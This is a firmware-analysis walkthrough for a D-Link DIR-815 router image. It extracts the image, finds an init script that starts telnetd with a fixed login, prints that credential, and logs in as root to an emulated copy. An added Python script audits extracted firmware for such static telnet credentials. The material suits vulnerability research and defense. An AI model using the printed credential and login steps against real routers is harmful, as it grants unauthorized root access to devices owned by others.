Extract the firmware with binwalk.
➜ binwalk -Me dir815_FW_102.bin
Scan Time: 2026-01-15 09:01:00
Target File: /home/ra1ny/FirmAE/dir815_FW_102.bin
MD5 Checksum: b2d6476de9b8270255dd6cb6329eb51d
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"
108 0x6C LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3017436 bytes
983148 0xF006C PackImg section delimiter tag, little endian size: 8399360 bytes; big endian size: 2785280 bytes
WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -le -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -le -d 'squashfs-root' '%e'' might not be installed correctly
WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -be -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -be -d 'squashfs-root' '%e'' might not be installed correctly
983180 0xF008C Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2783169 bytes, 1526 inodes, blocksize: 262144 bytes, created: 2012-01-19 04:03:49
Scan Time: 2026-01-15 09:01:00
Target File: /home/ra1ny/FirmAE/_dir815_FW_102.bin.extracted/6C
MD5 Checksum: e9da4a0f342b4fc9956f725fdb46f640
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
1227270 0x12BA06 PGP RSA encrypted session key - keyid: 801000 EA RSA Encrypt-Only 1024b
1227374 0x12BA6E PGP RSA encrypted session key - keyid: 801000 EA RSA Encrypt-Only 1024b
2096096 0x1FFBE0 MySQL MISAM compressed data file Version 8
2096332 0x1FFCCC MySQL MISAM compressed data file Version 8
2445344 0x255020 Linux kernel version 2.6.33
2487024 0x25F2F0 CRC32 polynomial table, little endian
2643904 0x2857C0 Neighborly text, "NeighborSolicitstunnel6 init(): can't add protocol"
2643924 0x2857D4 Neighborly text, "NeighborAdvertisementst add protocol"
2648675 0x286A63 Neighborly text, "neighbor %.2x%.2x.%.2x:%.2x:%.2x:%.2x:%.2x:%.2x lost on port %d(%s)(%s)"
binwalk reports No such file or directory: 'sasquatch' here; installing sasquatch fixes it.
git clone https://github.com/devttys0/sasquatch
cd sasquatch && ./build.sh
If the build fails with this error:
unsquashfs.c:1835:5: error: this ‘if’ clause does not guard... [-Werror=misleading-indentation]
1835 | if(swap)
| ^~
unsquashfs.c:1841:9: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
1841 | read_fs_bytes(fd, SQUASHFS_START, sizeof(struct squashfs_super_block),
| ^~~~~~~~~~~~~
cc1: all warnings being treated as errors
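make: *** [<builtin>: unsquashfs.o] Error 1
then use the following command:
git pull origin pull/56/head && ./build.sh
Then run binwalk again to extract. Several directories with the .extracted suffix will appear; open them one by one. Mine was in:
cd _dir815_FW_102.bin-2.extracted
The firmwalker tool is needed next:
git clone https://github.com/craigz28/firmwalker.git
cd firmwalker
Use firmwalker to collect information and save the results to dir815.txt:
./firmwalker.sh ../squashfs-root ./dir815.txt
Pay particular attention to the system startup scripts under init0.d.
t/etc/init0.d/S80telnetd.sh
Then review the code: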
➜ squashfs-root git:(master) ✗ cat etc/init0.d/S80telnetd.sh
#!/bin/sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
if [ -f "/usr/sbin/login" ]; then
image_sign=`cat /etc/config/image_sign`
telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
else
telnetd &
fi
else
killall telnetd
fi
The password is the content of image_sign:
➜ squashfs-root cat ./etc/config/image_sign
wrgnd08_dlob_dir815
Download the FirmAE tool to emulate the firmware:
git clone --recursive https://github.com/pr0v3rbs/FirmAE
./download.sh
./install.sh
After installation completes, start it:
sudo ./run.sh -r dir815 ./dir815_FW_102.bin
Result:
➜ FirmAE git:(master) ✗ sudo ./run.sh -r dir815 ./dir815_FW_102.bin
[sudo] password for ra1ny:
[*] ./dir815_FW_102.bin emulation start!!!
[*] Extract done!!!
[+] get architecture done!!!
[+] Start emulation!!!
[IID] 2
[MODE] run
[*] ./dir815_FW_102.bin already succeed emulation!!!
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
Creating TAP device tap2_0...
Set 'tap2_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 5.169506216 25.379649267
➜ ~ nmap 192.168.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 11:12 CST
Nmap scan report for 192.168.0.1
Host is up (0.0064s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
23/tcp open telnet
53/tcp open domain
80/tcp open http
49152/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
Then log in via telnet.
➜ ~ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgnd08_dlob_dir815
# pwd
/
# ls
root www sys lib dev
run var sbin htdocs bin
etc_ro usr proc home lost+found
firmadyne tmp mnt etc
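An added example, not part of the original post: a Python audit check that walks an extracted rootfs and flags init scripts, like the S80telnetd.sh reviewed above, that start telnetd with a static -u user:password, resolving variables that are read with cat from files inside the image. The function names, the sample tree and its image_sign value are constructed for illustration.

```python
import os
import re
import tempfile

ASSIGN = re.compile(r"^\s*(\w+)=(?:`|\$\()\s*cat\s+([^\s`)]+)", re.M)  # var=`cat /path`
TELNETD_U = re.compile(r"\btelnetd\b[^\n]*?\s-u\s+([^\s:]+):(\S+)")     # telnetd ... -u user:secret
VAR = re.compile(r"\$\{?(\w+)\}?")


def read_text(root, rel):
    """Read a regular file inside the rootfs; symlinks are skipped so host files are never read."""
    path = os.path.join(root, rel.lstrip("/"))
    if os.path.islink(path) or not os.path.isfile(path):
        return None
    with open(path, "r", errors="replace") as fh:
        return fh.read()


def audit_rootfs(root):
    """List scripts under etc/ that start telnetd with a static -u user:password."""
    findings = []
    for dirpath, _dirs, files in os.walk(os.path.join(root, "etc")):
        for name in sorted(files):
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            text = read_text(root, rel) or ""
            sources = dict(ASSIGN.findall(text))  # shell variable -> file it is read from
            values = {var: read_text(root, src) for var, src in sources.items()}
            for user, secret in TELNETD_U.findall(text):
                resolved = VAR.sub(lambda m: (values.get(m.group(1)) or m.group(0)).strip(), secret)
                refs = [sources[v] for v in VAR.findall(secret) if v in sources]
                findings.append(dict(script=rel, user=user, password=resolved, read_from=refs))
    return findings


def make_sample_rootfs():
    """Constructed sample tree mirroring the layout above; the sign value is made up."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    for d in ("etc/init0.d", "etc/config"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "etc/config/image_sign"), "w") as fh:
        fh.write("constructed_sign_value\n")
    with open(os.path.join(root, "etc/init0.d/S80telnetd.sh"), "w") as fh:
        fh.write("#!/bin/sh\nimage_sign=`cat /etc/config/image_sign`\n"
                 "telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &\n")
    return root


if __name__ == "__main__":
    print(audit_rootfs(make_sample_rootfs()))
```

Point audit_rootfs at the real squashfs-root directory to check an extracted image; a finding whose password resolves from a file shipped in the image means the same credential is present on every device running that firmware.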